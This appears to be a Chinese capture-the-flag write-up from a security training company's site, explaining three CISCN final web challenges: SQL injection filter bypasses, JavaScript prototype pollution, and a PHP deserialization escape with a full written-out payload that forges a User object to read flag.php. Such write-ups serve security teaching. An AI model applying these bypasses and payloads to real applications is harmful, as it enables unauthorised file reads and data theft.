• 新闻动态
  • 行业动态
  • 公司新闻
  • 关于我们
  • 公司简介
  • 经典活动
  • 网安知识
    对ciscn final的web的小解析
    2020-10-14 13:10

    1 Web

    输入1点击输入框后会显示如下参数:

    1.jpg

    看下源码能得到这么两句sql语句:

    2.jpg

    会发现左右过滤不相同,尝试如下可以把limit语句注释掉:

    3.jpg

    此时sql语句变成:

    4.jpg

    空格被过滤了,可以考虑\t或\n来绕过,因此输入如下会发现语句执行成功:

    5.jpg

    or 1=1发现等于号被过滤,fuzz一下能得到部分可用函数,且左边没有过滤减号:

    6.jpg

    过滤逗号可以采用from(1)for(1)的形式来绕过。

    盲注脚本:

    7.jpg

    2 Web2

    比赛没咋看这个题,源码只存了个app.js跑不起来就没复现,大概看了一下是原型链污染。

    player是一个字典,注意到:

    因为monster也是一个字典,且存在hp,并且我们是先攻击怪兽,因此我们污染buff的话就可以一刀秒了boss,然后就是用这一个循环进行污染:

    8.jpg

    传入:

    9.jpg

    那么就会把玩家的buff污染为1000,那么看到伤害的计算:

    0.png

    攻击+buff,也就是说这里就可以让玩家攻击无限大直接秒了boss了。

    本地测试可以发现如下:

    11.png

    打败boss即可getflag。

    3 Web3

    Web3其实考了两个点一个是反序列化逃逸,一个是反序列化串中的s替换为S时可以把字符串用16进制表示,个人感觉这个题其实就是0ctfpiapiapia+强网杯2020的web辅助。

    wwwroot.zip源码泄露。

    给了一个user类,逃逸点在于:

    12.jpg

    至于从哪里进行序列化串的传入,看到:

    13.png

    先说我们传入的虽然是一个数组, 但因为waf处如果我们传入一个flag,就会被替换为index,此时长度差为1。

    14.png

    在这里会把我们的序列化串waf后再反序列化,我们利用它可以逃逸出来一个user对象。

    15.png

    waf的话可以使用s替换为S以此使用16进制来表示flag.php来绕过,这一个过滤限制了我们只能使用old_password字段,否则的话可以采用gopher替换为index来吃掉部分序列化串。

    16.png

    需要伪造的序列化串为这么一串东西,长度为196,所以这里需要196个flag替换为index:

    17.png

    本地模拟一下过waf会发现这里长度980其实就是index的长度总和:

    18.png

    那么余下的序列化串理所当然就逃逸出去了。

    update_username=1&old_password=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:1:"1";O:4:"User":6:{S:8:"username";s:1:"1";S:8:"password";s:1:"1";s:3:"age";s:1:"1";s:5:"email";s:1:"1";S:12:"\00User\00avatar";S:8:"\66\6C\61\67\2E\70\68\70";S:13:"\00User\00content";s:0:"";}&update_password=123&update_age=1&update_email=231@qq.com

    当然了如果没有前面对字段的格式过滤,也可以采用如下的payload:

    update_username=1&old_password=1&update_password=1&updat

    上一篇:堆重启_uaf_hacknote
    下一篇:BurpSuite实战——合千赢官方下载安实验室学习笔记
    版权所有 合天智汇信息技术有限公司 2013-2020 湘ICP备14001562号-6
    Copyright © 2013-2020 Heetian Corporation, All rights reserved
    4006-123-731